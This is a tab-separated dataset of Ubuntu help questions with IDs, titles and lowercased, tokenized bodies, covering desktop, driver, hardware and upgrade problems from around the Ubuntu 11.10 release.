67660	is it possible to customise the search engine buttons in gnome shell ?	when searching in gnome-shell , there are two buttons towards the bottom of the screen which can be used to search with wikipedia and google . is there any way to customise these ? if , say , i wanted to replace the google button with one for duckduckgo , how would i go about this ?
67662	how can you transfer wireless settings from windows to ubuntu ?	wubi did not transfer the wireless settings during the install . how can i transfer them ? i do n't want to install anything , nor retype the information , it 's really complicated .
67663	how to share a wired internet connection with an android phone ?	i have been trying to share my wired internet connection with my android phone . however i could not succeed in doing this . has anyone of you ever succeeded ? operating systems that i use are as follows : ubuntu 10.10 android 2.3
67669	black screen at boot on an hp probook 4530s	i see there are lots of questions about black screen after boot , but none of them helped me at all . my conf is hp probook 4530s i5-2401m with some ati radeon graphic card . after some playing with apache and second `` hard '' reset ( not during any kind of update ! ) , it stopped showing log on screen , and showed black empty screen . now , i can login with ctrl alt f1 entering my username and pw , but since i do n't have much experience with ubuntu tbh , just do n't know what 's the next step , if there is one ...
67676	dell inspiron n5010 does n't resume from suspend	i have freshly installed ubuntu 11.10 . when i suspend my system , ( a dell inspiron n5010 ) and try to start it again , it just shows a lit up black screen . please somebody help because as it is there is no option for sleep . so you ca n't save your work and turn off the laptop .
67678	how do i turn on focus follows mouse ?	i just installed ubuntu 11.10 on a laptop of mine . where do you turn on window autofocus on mouse hovering in this new version ? i used to be able to do it very easily in 11.04 . update : i 'm looking for `` select windows when the mouse moves over them ''
67680	why does compiz use 25 % cpu while idle ?	after clean boot with only chrome running idle , compiz is taking 25 % all the time . it keeps my fan running non stop . is this a regression or something ?
67681	frequency out of range ati hd 4670	today , i installed ubuntu 11.10 on my desktop computer . i have never used linux before , so i am completely new to it . it started out quite well , and i like it quite much right now . though , i can not install drivers to my graphic card . my graphic card is sapphire hd radeon 4670 , and whenever i install drivers with the hardware drivers application , or install drivers from ati.com , i get `` frequency out of range '' as soon as i reboot the computer . that 's why i have reinstalled ubuntu like 4 times today . i am sick of it , and now i want a real solution . have you guys got any solutions ? thanks in advance .
67685	microphone not working at all on a toshiba sattelite p505 s8980	my built-in microphone does n't work in `` record audio '' program and in skype . i 'm using ubuntu 11.10 in toshiba sattelite p505 s8980 . no mute button checked i have pulseaudio volume control installed currently when aim trying to use record audio program and hear what i record it plays noisy sound not my voice i changed my computer from 'analog stereo output ' to 'analog stereo duplex ' , in both sound setting ( ubuntu ) and in pulseaudio volume control no problem in bios and in my windows seven sound worked perfectly and in ubuntu no problem in sound at all i can play music and movies and even in skype i can hear the sounf of who is taking to me ( it 's about the microphone only ``
67686	why does n't my ppa show up on launchpad ?	i 'm trying to create a project with quickly , and to make it available on launchpad through a ppa . i created a ppa ( ppa : vetetix/quickgcal ) and a project page ( quickgcal ) . i added code , shared it , released it , etc . several packages are “available” on launchpad , but when i go to the ppa 's location , i get a 404 , as if the ppa had n't been created . my question is : did i do something wrong ? should i wait some more ? is there a bug on launchpad which screwed my ppa ? project page ppa page
67687	backup partitions belong to root , how do i fix it ?	i 've did a clean install of ubuntu on my notebook . i created 3 partitions , swap , the ubuntu partition , and a backup or files partition ( located in /media/backup ) . the thing that i do n't understand is why my backup partitions permission are set for root only . i 've changed using sudo plus chown , but in previous versions of ubuntu , i never had this kind of inconvenience . does anybody know why this is set for root after installing ?
67692	can i resize icons on the launcher to smaller than 32 pixels ?	is there a way to get smaller icons in unity that are less than 32 pixels ? i would like to set it at something like 24 or 26 , because 32 is too big on a 1366x786 screen .
67693	gnome3 is unreadable	i have a serious problem . i have fully updated ubuntu 11.10 and i recently installed gnome3 . the problem is the taskbar , and the panel button that displays the activities are unreadable . i found nothing on the internet . please help . sorry for my bad english , i 'm spanish . : d. ! there is a screen capture of my pc .
67694	how can i enable autologin in ubuntu 11.10 unity	after upgrading from 11.04 the computer always ask for the password . how can i change this back to autologin .
67698	could not calculate the upgrade on distribution upgrade	i 've been trying to update ubuntu from 11.04 to 11.10 through update manager multiple times since the release but have encountered this error every single time : an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal . the apt.log contains a lot of messages similar to : investigating ( 8 ) gnome-control-center [ amd64 ] < 1:2.32.1-0ubuntu15 - > 1:3.2.0-0ubuntu6 > ( gnome ) broken gnome-control-center : amd64 depends on libgnome-desktop-3-2 [ amd64 ] < none - > 3.2.0-0ubuntu4 > ( libs ) ( > = 3.1.2 ) considering libgnome-desktop-3-2 : amd64 47 as a solution to gnome-control-center : amd64 22 holding back gnome-control-center : amd64 rather than change libgnome-desktop-3-2 : amd64 any ideas what i can do to resolve this ?
67699	how to fix kmymoney display size	i have loaded ubuntu 11.10 today but i am having problems with kmymoney . the display size of the program is to big for my screen and i can not resize it . it just does not seem to work due to this . i am running the same program in windows and earlier versions in ubuntu 10.04 . these are all ok . i am using a eee1000h 10 '' netbook . any help would be appreciated . i am not a linux expert so go easy with any answer . the program is usable using the keyboard commands , but the gui is 'broken ' due to the program display size being too big for the screen . there is no apparent way to resize the display . this appears to be an issue introduced in 11.10 .
67701	how can i prevent the screen from being locked after resuming from suspend	after upgrading to ubuntu 11.10 my screen locks after resuming from suspend . unticking autolock in gconfig doesnt work anymore . any ideas ?
67702	ca n't login as admin after upgrading from 11.04 to 11.10	all , i can login using the guest account and i can login using the terminal ( ctrl-alt-f1 ) . every time i try to login graphically it accepts my password and attempts to log in . something fails and then the graphical login screen returns . i have read that executing the following command sudo rm ~/.xauthority is supposed to help . unfortunately , this command just returns 'ca n't find file ' . i really need to get this fixed ... my wife needs to use the computer and get to her files . another glitch i noticed is that the shutdown always return the login screen instead of shutting down the computer .
67713	switching between workspaces does n't work - how to fix it ?	i 've updated to ubuntu oneiric and my workspaces are gone . better put , keyboard shortcuts ctrl + alt + left/right arrow do not work now . is it possible that compiz is broken somehow ? can i repair it ? note : i 've used developer versions of ubuntu oneiric some time and just upgrade to latest version now . thanks for a suggestion !
67718	how do i disable a touchpad using the command line ?	is there a way to disable a touchpad using a terminal command ?
67730	no hardware acceleration with hd4850 card	i have a selfbuilt computer with asus a7n8x-e motherboard that has given me headache ever since lucid . bought a new graphic card , hd4850 , agp8x.1gb memory . fglrx no luck , games ok but otherwise laggy feeling and freezing now and then , specially when i 'm doing something important ... open drivers much much better . drivers from xorg-edgers gave me acceleration and hope . until the ocelot ... glxinfo looks good , but it is not . ca n't use anything with 3d . happy with 2dunity so no problem , but there are other apps that i really want to use , say stellarium for example . my guess is two or three things that causes problem : incomplete r600gallium driver ? pregallium worked ok. agp ? everywhere says r600g is ready enough . not for me , so i 'm looking at my old agpslot ... and finally kms ... ? any suggestions , please !
67732	`` normal '' ubuntu does not work after update to 11.10	i upgraded from 11.04 to 11.10 and now the `` normal '' ubuntu does not work . i guess there are some issues with the video drivers ( i have a dell inspiron 1545 ) . all i can see is a bar at the top and the wallpaper - no gnome interface , no unity . to fix this i have to logout and choose ubuntu 2d . any suggestion how i can fix this completely , e.g . by getting `` normal '' ubuntu to work or set ubuntu 2d as default ? thanks in advance
67734	eclipse ca n't find index libraries of gcc or g++	the instalation of cdt tools on eclipse ca n't find on index libraries of gcc or g++ , but the file is running . ex : include stdio.h ( the comment does n't accept < > and # ) the are a yellow line description : unresolved inclusion . if i try to acess the library , just ca n't open because is not found .
67738	installation keeps hanging up at `` installing saved packages ... ''	i 've been trying to install 11.10 over ms vista from a usb stick , but every time it gets to `` installing saved packages ... '' it has hung up . i 've been trying this all morning . seems to be getting worse . and the machine wo n't boot now except from the usb stick
67741	gnome shell freezes when using external usb drives	sometimes my system freezes when i use my external usb hdd ( western digital 500gb ) . i am using a freshly upgraded ubuntu 11.10 installation . the freeze is not reproducable but always happens right after i unplug the device . the last time it happened right after i clicked the `` eject '' button in the gnome shell notification that appears when you plug in an external drive . it is a real freeze , i have to hard reset the system when it happens . any ideas ?
67743	open with `` gedit ''	after upgrading to ubuntu 11.10 i have found that my `` open with gedit '' right click menu in the file manager does not work unless i use it twice . does anyone know why this might be ?
67745	why does my name show as [ invalid utf-8 ] ?	i just did an upgrade ( from 10.10 - > 11.04 - > 11.10 ) and am trying to get everything figured out . i notice that when i log in , my name is [ invalid utf-8 ] . where is this coming from , and how can i fix it ? update : i tried creating a new user under 11.10 , but logging in as that user showed the same problem , so it 's probably not related to the upgrade .
67747	performance problems with fglrx driver	i have moved from ubuntu 11.04 to 11.10 today and i am not impressed . i expected more in this version . there is some improvement but also many bugs . it works very slow for me . graphic is very very slow . i have installed ati/amd proprietary fglrx graphics driver but it is still slow . how to fix graphic problems ? ?
67749	switch layout by capslock and do nothing by shift+capslock	i need switch keyboard layout by caps lock . i did system settings - > keyboard layout - > options - > keys to change layout - > caps lock and it works . but sometimes i press shift + caps lock and i get angry , so i want to block shift + caps lock to have upper case . how can i achieve this ? i tried to select system settings - > keyboard layout - > options - > caps lock behavior- > disable caps lock , but after that caps lock does n't change layout , as i want . os is ubuntu 11.10 what should i do to achieve this ? started bounty
67750	acer aspire 5720g bluetooth keeps turning on on reboot	i 'm using acer aspire 5720g and after every reboot bluetooth module activates by default . i just want to use bluetooth under my control . how can i fix this problem ?
67752	how can i tell if i 'm affected by `` the 11.10 battery power drain '' ?	i 've seen hints at some kernel power bug affecting battery life if updating to 11.10 -- as for example here . i relation to this , i have three questions : how can i tell if my machine is affected after having updated ? what can i do to fix the problem ? will these solutions have a negative effect if i 'm not affected by the problem ? for example , will the proposed workaround from the link above have any negative consequences ?
67753	how do i add an application to the dash ?	i just installed oneiric ocelot , and i ca n't figure out how to add an application , which is stored in my home directory , to the dash . i can create a launcher , but i want it in the dash also .
67754	can i configure double-click title bar behavior ?	prior to upgrading , i had my system configured so that double-clicking the title bar would roll up the window , just leaving the title bar . is this possible with 11.10 ? behavior seems inconsistent - firefox seems to try , but then the titlebar disappears , and that entire set of tabs seems to be gone until i restart ; chrome just goes to full screen , while a terminal does nothing . is this a parameter that can be configured ? if so , where ?
67756	will unity interfere with gnome-shell ?	do you think having unity would mess with shell ? i ask this because i already have had the issue of the unity global menu appearing behind the gnome panel . i have resolved it , however do you think that there could possibly be other bugs caused by presence of both de ?
67757	install ubuntu 11.10 from 11.04	i just tried to install ubuntu 11.10 ( from 11.04 ) . all the packages have been downloaded , and installed . but in the end ( before cleaning up ) , a window popped up : could not install the upgrades : the upgrade has aborted . your system could be in an unusable state . a recovery will run now ... . then the installation has exit . i manually restarted the computer , visually i am using now ubuntu 11.10 . but still the resting stages of installation cleanning up has not been run . does anyone know if it is normal ? what should i do to amend that ? thank you !
67758	how can i deactivate bluetooth on system startup ?	how can i deactivate bluetooth on system startup ?
67760	authentication key is n't automatically imported when adding a ppa	in previous ubuntu releases adding a ppa in software sources imported an authentication key automatically . but since i installed 11.10 this feature is gone , so i must save and import the key manually . is it a bug , or i can just change something in configs to get autoimport back ?
67762	mysql-workbench only shows splash screen when being launched	i 've downloaded mysql-workbench 5.2.35 and installed it , but when i run it , it shows only the splash screen , nothing more .
67764	how to remove and reinstall gnome 3 ?	i need to remove gnome 3 , so i can re-install it , for i experienced a huge power surge that disrupted my session in gnome 3 , and currently , the gnome 3 interface is acting strangely .
67767	how do you disable the global menu in digikam ?	i use digikam which suffers from a bug that means the editor loses its menu after the first launch . in 11.04 i could disable the global menu for digikam by launching it with : appmenu_display_both=1 digikam however this appears to have stopped working in 11.10 . is there some other way to get an application to show the menubar in the window rather than the panel ? ( just checked and appmenu_display_both=1 gedit does lead to gedit having a menu in the window . but maybe there is some other way ? )
67769	using numlock for trendnet kvm switch no longer works	i have a trendnet tk-209 kvm switch , and since upgrading to 11.10 , i can no longer switch between systems using numlock-numlock from ubuntu . ( i also tried scrlk-scrlk ) . if i switch manually to my windows box , i can get back to the ubuntu system with numlock-numlock , so it 's not a problem with the keyboard or kvm switch . is there a setting that will allow this to work again , or an alternative keystroke ? failing that , is there a way to configure the switch to allow it to be triggered from ubuntu ? edited to add : this may be a gnome 3.x problem , since i tried booting with a fedora live cd and it was also unable to use either key sequence to switch over to the other system .
67773	change shortcut < alt > right	in my 11.04 , the < alt > right was used to put a window to the right half side of the screen . i configured it via compizconfig settings manager . i just upgraded my system to 11.10 , all other customized shortcut keys keep working , except this < alt > right . now it has the same functionality as alt+tab , so swithing application . i have checked compizconfig settings manager , which is still as before . and the shortcuts list of keybord setting , it seems that no one uses < alt > right . does anyone know what happened ? thank you
67775	install gnome3 ( gnome-shell ) on kubuntu problem	i tried to install gnome shell on kubuntu with this commands sudo apt-get install gnome-shell sudo apt-get install gnome-session and i just found gnome classic session when logging in , are there any messing things ? ? âź
67779	odd problem of editing a text in chrome	it is a very odd problem ... i used ubuntu 11.04 and just upgraded to 11.10 . in both systems , very often when i try to write some text in a web page of chrome , it allows me to write several letters , then i am stuck -- - i could not write anymore . to overcome this , i have to switch to another application , and switch back , then i could keep typing ... does it happen to other people ? does anyone know what happens ? thank you
67780	`` not a com32r image '' error when trying to install from a usb key	not a com32r image boot is a message that the console infinitely keeps spitting out when i try to install ubuntu 10.04 from a usb . i created the usb using the startupdiskcreator in 11.04 . what is the reason for this behavior ? what do i do to set it right ? i have followed the steps perfectly , as enlisted in the ubuntu install from usb page .
67785	why does google chrome not show websites ' correct fonts ?	i just did a fresh install of 11.10 , and installed google chrome . for many sites it does not display the correct font ( it shows the fall-back font instead ) . both chromium and firefox show fonts correctly . is there a fix for this ?
67791	how to uninstall ubuntu one ?	i 've looked in the software center , and there is an entry under accessories for ubuntu one , but i 'm not sure if that 'll actually remove ubuntu one . on ubuntu one 's website , it gives a bunch of terminal commands to remove it , so should i use those or use the entry in the software center ? the reason i 'm trying to remove ubuntu one is because its sync does n't work with my comp for some reason . it keeps saying that its trying to sync files in the client window , then it stops with the red x next to it after a few seconds . if ubuntu one is this useless , i see no use for having it on my computer .
67792	3d not working any more after adding xorg-edgers ppa	i updated my perfectly running laptop from 11.04 to 11.10. after the upgrade graphics started to act weird . it was a heavily modified system , so i thought that was probably the issue.. so i reinstalled . i 'm using the xorg-edgers ppa for updates . unity 3d does not work ... i hear ubuntu 's jungle sound and then it just sits there ... no icons , just a mousecursor i can move and the background picture . i have to kill x and log in to unity 2d to get access to my desktop . where do i start looking for the problem ? i know it 's not the graphics card , it worked fine until the update . grep -e `` ee|ww '' /var/log/xorg.0.log ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 14.365 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 14.365 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 14.365 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 14.365 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 14.365 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 14.379 ] ( ii ) loading extension mit-screen-saver [ 18.758 ] ( ww ) evdev : logitech usb receiver : ignoring absolute axes . /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 7.12-devel not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes thanks in advance for any help : - )
67795	themes , fonts - why ca n't u change it anymore ?	why is it not possible anymore the change the themes and fonts ?
67805	how can i get dual pivot monitors working with nvidia ?	i have both monitors in portrait mode ( i.e . they 're vertical , not horizontal ) . only one monitor shows an interface , the other is blank ( white ) . i also do not know how to rotate the displays - i have n't seen an option for it . os : linux-x86_64 ( ubuntu 11.10 ) gpu : 2x nvidia geforce 550 ti nvidia drivers : v280.13 here is a screenshot of the one desktop that i can see ( it 's rotated by 90 degrees ) .
67808	getting gnome-shell working on nvidia optimus notebook	what i need is to enable the lamest hardware acceleration to get gnome-shell or unity 3d working . i know about bumblebee/ironhide/bumblebee-project . but i didn't understand how to use it directly with x11 server to enable the use of those advanced environment . i do n't care about what card will give me gnome-shell/unity3d working . i wonder if there is a way to use only intel ( but accellerated ! ) i really do n't care about power save i 'm tired to be reverted to gnome-session-fallback or unity 2d . please tell me if there is a way or if i will be stuck with gnome 2 . * until i 'll buy another laptop .
67811	ca n't get 1280x800 screen resolution	how can i enable 1280x800 screen resolution ? i started to have this issue once i switched from windows xp to ubuntu 11.10 . are there any drivers i need to download ? i checked and ubuntu says there are none available for me . system : dell inspiron b130 512 mb ram 40 gb hdd intel celeron m processor
67812	scanning from hp photosmart c4580 - what is sane ?	i have a multifunction hp printer/scanner . i 've always used it wirelessly with a pc before now , but want to connect it to my maverick laptop . i have hplip installed and have connected the machine to the computer via usb ( wireless is not supported . ) the printer works just fine , but when i try to scan , the scanner 's console ( not the computer , but the window on the scanner itself ) tells me there 's an error . i 've looked at the hplip documentation for my machine , and it says , `` scan supported means that pc initiated scan using a sane compatible software application is supported over parallel , usb , or network ( depending on i/o connection ) . '' what is sane ? i 'm assuming it 's a driver that 's already installed , but where do i find a sane compatible software application ?
67813	workspace switcher inoperative on nvidia dual displays	when i click the workspace switcher button ( or a button i 've mapped to my mouse to do the same task ) , the screen shows several artifacts and i can not switch displays properly . here is a picture of the display after i 've clicked the workspace switcher button : i have an nvidia n260 video card with dual displays connected
67817	remove old emblems from previous nautilus version	i 've upgraded to ubuntu 11.10 , and i 'd like to remove the emblems i put on certain folders from the previous menu of nautilus . how can i do this ?
67818	is gnome broken in 11.10 ?	me and my friend both installed gnome on 11.10 i have problem that i cant left click on top bar , middle click also doesnt work . my friend gets weird tiny light blue boxes in gui ... so is gnome broken in 11.10 or we just have bad luck ? oh and pcs arent similar , his is amd/ati laptop , mine is intel/nv desktop edit : to make it clearer : i use gnome classic , and right click on top bar wont work ... you know add to panel ... . that menu behaves like it doesnt exist . my friend fixed his problem in gnome 3 by going bact to open source driver . but he still cant right click on top bar on gnome classic .
67819	change hotkeys/shortcut keys for volume control	i need to change the hotkeys for volume control , since i suffer from a bug , which disallows me to use the standard function hotkeys of my notebook . since i have updated i to oneiric , i am not able to change the settings for the hotkeys . it is neither possible in system settings nor in gconf-editor . current buggy configuration : volume mute : fn + f3 volume down : fn + f4 volume up : fn + f5 desired configuration : volume mute : ctrl + f3 volume down : ctrl + f4 volume up : ctrl + f5 if you need further information , i will be happy to provide it . i tried to overwrite the standard settings by creating a new one in the âcustom shortcutsâ category . even this attempt is unsuccessful . is there a possibility to access this menu as root ?
67820	how can i make indicator session only show my username and not my full name ?	my panel has a lot of indicators , and my full name is large . is there a way to set ubuntu 11.10 to behave like ubuntu 11.04 and only show my username ?
67822	ubuntu 11.10 randomly crashes to a screen full of numbers ?	i 'm very new to ubuntu and only got it because i had the blue screen of death on windows 7 . now it will randomly crash to a screen that looks like terminal with tons written on it ? is this because of my past problems or because of ubuntu ? how do i fix this ? any help is appreciated .
67828	problem to write long lines in terminal	i have defined a ps1 prompt multi-line in my server with ubuntu 11.04 . the problem occurs when i write a long command , the line cuts before the end of terminal and it continues at beginning the same line : but if i continue writing the line ends at the end of window and it continues in next line , as expected : and if i press home key the cursor goes to the line above the first line . i connect to server with ssh in a gnome-terminal . the ps1 line in /etc/bash.bashrc is : [ $ uid -eq `` 0 '' ] & & ps1= '' \e [ 31m┏━\e [ 42m┅◉ \e [ 37m\d ⌚ \t \e [ 31m┅\e [ 0m\e [ 31m━━\e [ 42m┅◈ \e [ 37m\h \e [ 0m\n\e [ 31m┣\e [ 0m \w ( \e [ 36m\ $ ( ls -1 | wc -l ) fichero/s\e [ 0m ) \n\e [ 31m┗\e [ 45m┅◉\e [ 1 ; 37m \u \e [ 0m\e [ 31m━► `` || ps1= '' ┏━\e [ 44m┅◉ \e [ 37m\d ⌚ \t ┅\e [ 0m━━\e [ 44m┅◈ \e [ 37m \e [ 0m\n┣━━\e [ 42m┅◉ kernel : \e [ 37m $ ( uname -r ) ┅\e [ 0m━━\e [ 42m┅◈ uptime : \e [ 37m $ ( date -d `` `cut -f1 -d. /proc/uptime` seconds ago '' + '' % a % d % b % r '' ) \e [ 0m\n┣ \w ( \e [ 36m\ $ ( ls -1 | wc -l ) fichero/s\e [ 0m ) \n┗\e [ 46m┅◉\e [ 1 ; 37m \u \e [ 0m━► `` some of the environment variables : $ env term=xterm shell=/bin/bash ssh_tty=/dev/pts/0 lc_all= lc_messages=posix lc_collate=c lang=es_es.utf-8 histcontrol=ignoreboth shlvl=1 less=-rsw lessopen=| /usr/bin/lesspipe % s lessclose=/usr/bin/lesspipe % s % s _=/usr/bin/env any idea ?
67831	how updates are handled for commercial applications ?	i 'm planning on publishing a commercial ( paid ) application to software center and i 've seen that during the process of submiting the app i have to upload a .deb package . i 'd like to know if there is any way to submit updates to my certain application once it is already in software center . as far as i know apps from the software center are all in a ppa and that 's how they get the updates , but in my case , there would be no ppa ( correct me if i 'm wrong ) thanks
67832	unable to set custom keyboard shortcuts	i just installed oneiric oncelot . it 's on a lenovo 4446-25u laptop , running unity , nothing really customized yet , it was a fresh install . i wanted to add a keyboard shortcut for terminator and netbeans and few other apps i use . for instance , i want terminator to run when i press ctrl+alt+t , firefox when i press ctrl+alt+f , etc . i opened the system settings > keyboard > shortcuts > custom shortcuts > + ... added `` launch terminator '' with a command of `` terminator '' and clicked `` apply . '' it shows up in the list with `` disabled '' to the right . so i click on it to highlight it and press my ctrl+alt+f key combo ... and it stays at disabled . so i look around in the shortcuts , and i 'm able to set the key combo for the other items . for instance , for `` launch terminal '' i highlight it , press `` enter '' and it says `` new command ... '' and i press ctrl+alt+t and it works . i thought , oops , doubled a command . so i disabled the `` launch terminal '' shortcut with backspace , went back to my custom one , and it still does n't read the key combo . it still just says `` disabled . '' what am i doing wrong ? ? ?
67833	gedit is having problems starting up	i just installed the new version of ubuntu 11.10 ( 64 bit ) . mr processor is intel i7 . i am noticing that gedit is having problems starting up . i start it then it crashes out with no error message and i have to click the icon again to start it . i am having the same problem with the built in file manager . i will click on some folder and the window for the application will close entirely . any ideas ?
67837	why is there no clear day weather icon in the ubuntu mono icons set ?	all the other weather icons seem to be present , but when the weather is clear or sunny , the icon reverts to an ugly yellow sun instead of the lovely mono icons . why is this icon missing ?
67838	how to transfer the whole contents of a folder ( recursively ) from one server to another ?	i have a /home/jbruni folder in a vps running ubuntu server 10.04 lts ( lucid lynx ) . i am about to turn this vps off and move some things from it to a new vps , also running the same ubuntu version . at the moment , i want to move all contents at /home/jbruni from the `` old '' vps to the new one . 1 ) i want to preserve all file permission and ownership settings ( i do n't want to use any chown or chmod after the transfer ) . [ note : the new vps already have the same users/groups with same uids/gids . ] 2 ) i want to preserve all symlinks and hardlinks , although i believe there is not a single hardlink in this case . i have lots of symlinks , both for files and for folders , all pointing to locations inside the own /home/jbruni folder . 3 ) i 'd really like to preserve date and times ( mtime , atime , ctime ) . [ if not possible , ok ... it is not that bad . ] 4 ) i do n't have enough disk space to create a big file containing everything in the `` old '' vps prior to transfering it ( like a big tarball ) . anyway , i may acquire this temporary extra space if really really needed . so , what i want is like a `` mirror '' of the source folder . is there a way to accomplish this easily ? ( or even not so easily ? ) thank you !
67842	toshiba satellite e105 does not suspend when the lid is closed	just upgraded from 11.04 to 11.10 . power management worked fine in natty , now on lid close it just blanks screen but does not put the computer to sleep . interestingly , sometimes even does not blank screen at all , but when the lid is reopened , does it for a second or two , and then back to life . changing options from system settings and gconf-edit does n't help . anyone has a similar problem ? i 'm on toshiba satellite e105 , intel core2 duo p8400 , 4gb ram etc. , do n't even know why i 'm writing that : )
67845	gnome 3 showed panels on reboot . not intended ! anyone seen this before ?	i rebooted after a few successful gnome 3 reboots , but this time , i was welcomed by panels . my quickbar would not even show up when i pressed the super key . i have no idea what happened , but i think some part got reverted to gnome 2 ! please help ! ati mobility 4200 , ubuntu 11.10 64bit , gnome 3 ( more or less now ! ) any help is appreciated . screenshot :
67846	evolution error : mbox sent folder invalid uri	my dad has a pop email account , and has been using evolution to manage it since karmic or lucid ( with no problems ) . after upgrading him to oneiric a couple days ago , when i opened evolution , it asked to convert his mailbox format because the format had changed . ( i think it wanted to switch from mbox to maildir , but i ca n't remember . ) i allowed it to convertâthat was my only optionâbut now whenever he sends mail he gets this popup ( screenshot at end of post ) : your message was sent , but an error occured during post-processing . the reported error was `` failed to append to mbox : ///home/shopmaster/.local/share/evolution/mail/local # sent : invalid folder uri 'mbox : ///home/shopmaster/.local/share/evolution/mail/local # sent' appending to local 'sent ' folder instead. '' . the ls listing at /home/shopmaster/.local/share/evolution/mail is : 1260822881.20004.1 @ shopmaster-laptop local local_mbox pop vfolder launchpad bug # 850106 also deals with this issue , but i thought ask ubuntu might be a good place to get answers as well .
67849	problems with d-link dir 600 and my ar9285 wireless card	since yesterday , when i upgraded ubuntu to 11.10 , i 've had a very slow wifi connection . my route is a d-link dir 600 . with ubuntu natty all worked fine . in fact on the same netbook , i have linux mint 11 in another partition , and it works fine today . so i think is a problem between this router and kernel 3 . anyone have the same problem ? thanks and greetings from argentina ! ! ! pd *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 02 serial : 60 : eb:69:03:50 : e0 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f0520000-f0520fff memory : f0510000-f051ffff memory : f0540000-f055ffff *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 01 serial : 1c:65:9d:21 : f0 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a ip=192.168.0.10 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : f0100000-f010ffff
67860	how to prevent a partition from being mounted ?	i have two ntfs partitions that constitute a windows 7 install . i am running ubuntu and virtualize that windows install off the physical disk . while the vm is working it could be disastrous if mount any of those partitions and make changes to them . how do i prevent ubuntu from mounting these partitions _at_all_ ? tried something along the /dev/sda none ntfs , ro 0 0 in /etc/fstab but that just gave me an error.. thanks !
67861	how can i stop banshee from renaming files during a sync ?	currently i have sync set automatically and to transcode my flac files into mp3 . for multi-disc albums i have my tracks sometimes like `` 1-01 first song first disc.flac '' and `` 2-01 first song second disc.flac '' . after the sync it would then be `` 01 first song first disc.mp3 '' and `` 01 first song second disc.mp3 '' . this is a problem with sorting . and currently it screws up how my mp3 player sorts the tracks . i 'd just like to make banshee honor my file names ( i do not have the rename files option enabled , or even the write metadata . i use musicbrainz picard for tagging. ) . any help is wonderful !
67865	gnome 3 shell suspend has me locked out of my computer	from ubuntu 11.10 , i installed gnome 3 shell on my desktop computer . i studied it for a while , and then looked for the button to close the shell , but found only a suspend button . i clicked it and it shut everything down , but it left the computer still on . i did n't know the resume procedure , so i turned off the power for several seconds to reboot . when i turned the power back on the drive light flickered a few seconds and then the computer came back to the way it was before i tried to reboot . i tried this reboot a couple of times with the same results both times . can someone please tell me how to get out of this ?
67874	speed up booting time without losing choosing capability in grub	to speed up my boot time , i would like to get rid of the grub timing , but i would like to still be able to choose between different os . is there a way to do so ? i was thinking to tweak something so the power button boot in one os , the reset button boot in the other os ( and i do not have any reset button anymore ) anybody see a possibility to do that ? thanks
67878	languagetool on libreoffice installing error	when i 'm trying to install languagetool for libreoffice i get : `` an error ocurred writing or reading from a file '' .
67883	ca n't get wireless to work on a dell inspiron 1501	i 'm new to the world of linux-based os . i over-writed windows xp with 11.04 on a dell inspiron 1501 . wireless picked itself up and everything worked great . when updates to the os presented themselves , i always clicked yes and it all worked ; i assumed that a new distro would naturally work but when i dl'ed it 'was missing some firmware ' ( i did n't make note of what firmware it was missing ) . i have scoured the forums for a solution and nothing has worked . in dummy language , please tell me what to do so that my wireless-capable laptop can go wireless again . i 've tried to reinstall 11.04 all over and it still wo n't pick up the signal ; i 've tried to install the latest distro of kubuntu and it did n't work . at this point i have 11.10 installed and can only use it through a wired connection .
67888	ubuntu 11.04 still slow after upgrade	i had an amd athlon tf-20 cpu which was a single core that ran at 1.6ghz , 2 gig ram and an hd 3200 . unity runs slow as hell . i upgraded my cpu to an amd turion tl-56 dual-core which runs at 1.8ghz , and unity still runs slow . my sister 's laptop of 5 years with an intel celeron dual-core runs unity way faster than my laptop . can anyone suggest the problem here and a solution ? ... please .
67890	disable ati proprietary drivers by command line ?	i 've made the mistake of installing the ati proprietary driver by command line . steps i took : downloaded linux drivers opened the terminal sh amd..driver.run followed the steps rebooted this has caused my screen to not even load after a fresh install of 11.10 is there a way to remove of disable these proprietary drivers by command line ?
67891	broadband internet connection problem on ubuntu 11.10	i am using a broadband internet connection from a local isp . i installed ubuntu 11.10 yesterday but i could not configure my internet connection like i did on 10.04 before . on 10.04 , it was easy to configure and connect to internet . generally , i used dsl settings to configure my net . there i enter my user name , my connection 's name and password to connect with net . but now in 11.10 it 's not working . what can i do to connect it perfectly ?
